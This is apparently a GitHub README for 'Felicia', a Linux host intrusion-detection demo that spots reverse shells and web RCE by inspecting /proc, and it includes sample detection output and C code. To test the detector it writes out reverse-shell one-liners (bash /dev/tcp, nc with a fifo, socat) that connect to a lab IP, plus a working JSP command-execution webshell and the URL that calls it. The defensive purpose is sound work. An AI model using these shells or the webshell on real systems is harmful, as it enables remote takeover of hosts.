driverxdw / Felicia

HIDS/EDR Demo


Felicia

Simple HIDS/EDR (still under active development...)

Desc

A small project written for fun. The feature set and architecture are designed, but with very limited time and manpower the implementation is moving slowly: at the moment there is only the agent and no server, and intrusion detection covers only two cases, reverse shells and web RCE. The remaining features will be filled in as time allows.

How to use

root@ubuntu:~# cd Felicia/
root@ubuntu:~/Felicia# make
gcc felicia_plugin_reverse_shell.c felicia_main.c felicia_data_struct.c felicia_process_monitor.c felicia_process_handler.c \
felicia_init.c felicia_plugin_web_rce.c cJSON.c -o demo
root@ubuntu:~/Felicia# ./demo

Sample

Reverse shell

Victim:

bash -i >&/dev/tcp/192.168.31.162/7777 0>&1

or

mknod backpipe p; nc 192.168.31.162 7777 0<backpipe | bash 1>backpipe 2>backpipe

or

socat TCP4:192.168.31.162:7777 EXEC:bash,pty,stderr,setsid,sigint,sane

or else...

Attacker:

nc -lk 7777

Detection result:

root@ubuntu:~/Felicia# ./demo
reverse shell event
{
  'evt':'rvshell'
  'pid':'19256'
  'exe':'/bin/bash'
  'cmdline':'bash'
  'cwd':'/root/Felicia'
  'ppid':'19255'
  'pexe':'/usr/bin/socat'
  'pcmdline':'socat TCP4:192.168.31.162:7777 EXEC:bash,pty,stderr,setsid,sigint,sane'
  'uid':'0'
  'pname':'bash'
  'stdin':'/dev/pts/3'
  'stdout':'/dev/pts/3'
  'srcip':'192.168.31.115'
  'dstip':'192.168.31.162'
  'srcport':'43696'
  'dstport':'7777'
  'tty':'/dev/pts/3'
  'unixtime':'0'
}

root@ubuntu:~/Felicia# ./demo
reverse shell event
{
  'evt':'rvshell'
  'pid':'19230'
  'exe':'/bin/bash'
  'cmdline':'bash'
  'cwd':'/root/Felicia'
  'ppid':'14615'
  'pexe':'/bin/bash'
  'pcmdline':'-bash'
  'uid':'0'
  'pname':'bash'
  'stdin':'pipe:[140445]'
  'stdout':'/root/Felicia/backpipe'
  'srcip':'192.168.31.115'
  'dstip':'192.168.31.162'
  'srcport':'43694'
  'dstport':'7777'
  'tty':'/dev/pts/4'
  'unixtime':'0'
}

root@ubuntu:~/Felicia# ./demo
reverse shell event
{
  'evt':'rvshell'
  'pid':'18705'
  'exe':'/bin/bash'
  'cmdline':'bash -i'
  'cwd':'/root/Felicia'
  'ppid':'14615'
  'pexe':'/bin/bash'
  'pcmdline':'-bash'
  'uid':'0'
  'pname':'bash'
  'stdin':'socket:[136198]'
  'stdout':'socket:[136198]'
  'srcip':'192.168.31.115'
  'dstip':'192.168.31.162'
  'srcport':'43658'
  'dstport':'7777'
  'tty':'/dev/pts/4'
  'unixtime':'0'
}

web rce

Tested on the vulnhub tomcat8 target, running commands through a small JSP webshell.

Victim:

root@06bc32a5536b:/usr/local/tomcat/webapps/ROOT# cat getshell.jsp
<%
    // minimal command-execution webshell: ?pwd=023&i=<command>
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            // print only the bytes read in this chunk, not the whole 2048-byte buffer
            out.println(new String(b, 0, a));
        }
        out.print("</pre>");
    }
%>

Attacker:

http://192.168.31.115:8007/getshell.jsp?pwd=023&i=ls

Detection result:

root@ubuntu:~/Felicia# ./demo
web rce event
{
  'evt':'webrce'
  'pid':'19484'
  'exe':'/bin/ls'
  'cmdline':'ls'
  'cwd':'/usr/local/tomcat'
  'ppid':'15594'
  'pexe':'/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java'
  'pcmdline':'/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava./proc/19484/exe'
  'uid':'0'
  'pname':'ls'
  'stdin':'pipe:[141299]'
  'stdout':'pipe:[141300]'
  'tty':' '
  'unixtime':'0'
}
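
The two detections shown above (rvshell and webrce), as an added example that is not Felicia's own code (the project's logic lives in felicia_plugin_reverse_shell.c and felicia_plugin_web_rce.c and is not reproduced here). It walks /proc the way the event fields suggest: resolve exe, ppid, fd/0 and fd/1 for each process, flag a shell whose stdio is a socket or whose parent is a relay such as socat, flag any command spawned by the app server, and map a socket inode through /proc/net/tcp to the srcip/dstip/srcport/dstport fields. The shell, relay and web-server name lists are assumptions, and the /proc/net/tcp snapshot is constructed to match the third rvshell event (192.168.31.115:43658 -> 192.168.31.162:7777, socket inode 136198).

```c
/* Added example, not Felicia's own code: the rules behind the sample events above, against Linux
 * /proc. rvshell = a shell with a socket on stdin/stdout, or whose parent is a relay (socat/nc:
 * the pty variant of the first sample). webrce = any command spawned by a web/app server. Socket
 * inodes from /proc/<pid>/fd/N are resolved through /proc/net/tcp to fill srcip/dstip/srcport/
 * dstport. Name lists and SAMPLE_PROC_NET_TCP are assumed/constructed, not taken from Felicia. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <unistd.h>

enum fd_kind { FD_OTHER, FD_TTY, FD_PIPE, FD_SOCKET };
struct tcp_conn { char src[16], dst[16]; unsigned sport, dport, state; unsigned long inode; };
static const char *const SHELLS[] = { "bash", "sh", "dash", "zsh", "ksh", NULL };
static const char *const RELAYS[] = { "socat", "nc", "ncat", "netcat", NULL };
static const char *const WEB_SERVERS[] = { "java", "php-fpm", "httpd", "apache2", "nginx", NULL };

/* Classify the target of readlink("/proc/<pid>/fd/N"); *inode is filled for sockets and pipes. */
enum fd_kind classify_fd(const char *target, unsigned long *inode)
{
    unsigned long ino = 0;
    enum fd_kind k = sscanf(target, "socket:[%lu]", &ino) == 1 ? FD_SOCKET
                   : sscanf(target, "pipe:[%lu]", &ino) == 1   ? FD_PIPE
                   : !strncmp(target, "/dev/pts/", 9) || !strncmp(target, "/dev/tty", 8) ? FD_TTY : FD_OTHER;
    if (inode) *inode = ino;
    return k;
}
static const char *basename_of(const char *p) { const char *s = strrchr(p, '/'); return s ? s + 1 : p; }
static int name_in(const char *name, const char *const *list)
{
    for (; *list; list++) if (!strcmp(name, *list)) return 1;
    return 0;
}

/* rvshell: exe/pexe are resolved /proc/<pid>/exe links, stdin_t/stdout_t the fd/0 and fd/1 links. */
int is_reverse_shell(const char *exe, const char *pexe, const char *stdin_t, const char *stdout_t)
{
    if (!name_in(basename_of(exe), SHELLS)) return 0;
    if (classify_fd(stdin_t, NULL) == FD_SOCKET || classify_fd(stdout_t, NULL) == FD_SOCKET) return 1;
    return name_in(basename_of(pexe), RELAYS);
}
/* webrce: the child can be anything (the sample is /bin/ls); only the parent matters. */
int is_web_rce(const char *pexe) { return name_in(basename_of(pexe), WEB_SERVERS); }

/* /proc/net/tcp keeps IPv4 addresses as 8 hex digits in host byte order (little-endian on x86). */
#define IP4_OCTETS(v) (v) & 0xff, ((v) >> 8) & 0xff, ((v) >> 16) & 0xff, ((v) >> 24) & 0xff
/* Parse one data line of /proc/net/tcp; the header line fails the scan and returns 0. */
int parse_tcp_line(const char *line, struct tcp_conn *c)
{
    unsigned long la, ra, txq, rxq, tmw, retr, uid, tmo, ino;
    unsigned lp, rp, st, tr;
    if (sscanf(line, " %*d: %lx:%x %lx:%x %x %lx:%lx %x:%lx %lx %lu %lu %lu",
               &la, &lp, &ra, &rp, &st, &txq, &rxq, &tr, &tmw, &retr, &uid, &tmo, &ino) != 13) return 0;
    snprintf(c->src, sizeof c->src, "%lu.%lu.%lu.%lu", IP4_OCTETS(la));
    snprintf(c->dst, sizeof c->dst, "%lu.%lu.%lu.%lu", IP4_OCTETS(ra));
    c->sport = lp; c->dport = rp; c->state = st; c->inode = ino;
    return 1;
}
/* Find the connection owning a socket inode in /proc/net/tcp text (the live file or a capture). */
int find_conn_in_text(const char *text, unsigned long inode, struct tcp_conn *out)
{
    for (const char *p = text; p && *p; p = strchr(p, '\n'), p = p ? p + 1 : NULL) {
        struct tcp_conn c;
        if (parse_tcp_line(p, &c) && c.inode == inode) { *out = c; return 1; }
    }
    return 0;
}

/* Constructed /proc/net/tcp snapshot: inode 136198 is the third sample's connection,
 * 192.168.31.115:43658 -> 192.168.31.162:7777 (st 01 = ESTABLISHED). */
const char SAMPLE_PROC_NET_TCP[] =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0\n"
    "   1: 731FA8C0:AA8A A21FA8C0:1E61 01 00000000:00000000 00:00000000 00000000     0        0 136198 1 0000000000000000 20 4 30 10 -1\n";

/* readlink of /proc/<pid>/<what>; "" when the process is gone or not readable (root sees all). */
static const char *proc_link(int pid, const char *what, char *buf, size_t n)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/%d/%s", pid, what);
    ssize_t r = readlink(path, buf, n - 1);
    buf[r < 0 ? 0 : r] = '\0';
    return buf;
}
/* ppid from /proc/<pid>/stat: comm is parenthesised and may contain spaces, so scan after the last ')'. */
static int parent_pid(int pid)
{
    char path[64], buf[512], *rp;
    int ppid = 0;
    snprintf(path, sizeof path, "/proc/%d/stat", pid);
    FILE *f = fopen(path, "r");
    if (f && fgets(buf, sizeof buf, f) && (rp = strrchr(buf, ')'))) sscanf(rp + 1, " %*c %d", &ppid);
    if (f) fclose(f);
    return ppid;
}

/* Stand-alone run: one pass over /proc, printing every rvshell/webrce hit with its peer address. */
int main(void)
{
    static char tcp[1 << 20];                 /* one /proc/net/tcp snapshot; truncated on huge tables */
    FILE *f = fopen("/proc/net/tcp", "r");
    tcp[f ? fread(tcp, 1, sizeof tcp - 1, f) : 0] = '\0';
    if (f) fclose(f);
    DIR *d = opendir("/proc");
    struct dirent *e;
    while (d && (e = readdir(d)) != NULL) {
        if (e->d_name[0] < '1' || e->d_name[0] > '9') continue;
        int pid = atoi(e->d_name), ppid = parent_pid(pid);
        char exe[4096], pexe[4096], in[256], out[256];
        if (!*proc_link(pid, "exe", exe, sizeof exe)) continue;
        proc_link(ppid, "exe", pexe, sizeof pexe);
        proc_link(pid, "fd/0", in, sizeof in);
        proc_link(pid, "fd/1", out, sizeof out);
        const char *evt = is_reverse_shell(exe, pexe, in, out) ? "rvshell" : is_web_rce(pexe) ? "webrce" : NULL;
        if (!evt) continue;
        unsigned long ino = 0;
        struct tcp_conn c = {0};
        int net = classify_fd(in, &ino) == FD_SOCKET && find_conn_in_text(tcp, ino, &c);
        printf("%s pid=%d exe=%s ppid=%d pexe=%s stdin=%s stdout=%s src=%s:%u dst=%s:%u\n", evt, pid, exe,
               ppid, pexe, in, out, net ? c.src : "-", c.sport, net ? c.dst : "-", c.dport);
    }
    if (d) closedir(d);
    return 0;
}
```

Compile with gcc and run as root, otherwise /proc/<pid>/exe and /proc/<pid>/fd/* of other users' processes are unreadable and those processes are skipped. Two blind spots are worth knowing. The fifo variant (second sample: stdin `pipe:[...]`, stdout `backpipe`, parent `-bash`) is not caught by either rule; to cover it, look the pipe inode up in every /proc/*/fd and apply the relay check to the process holding the other end. And the SHELLS list only matches a spawned shell binary, so a reverse shell written in python or perl that never execs bash needs the socket-on-stdio check applied to any executable, not just the listed ones.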

TODO

  • Threat intelligence
  • Sensitive file change monitoring
  • Server (including the front end)
  • Thread pool
  • else...

Link

https://driverxdw.github.io/2020/12/14/Felicia-Hids-Demo-Design/
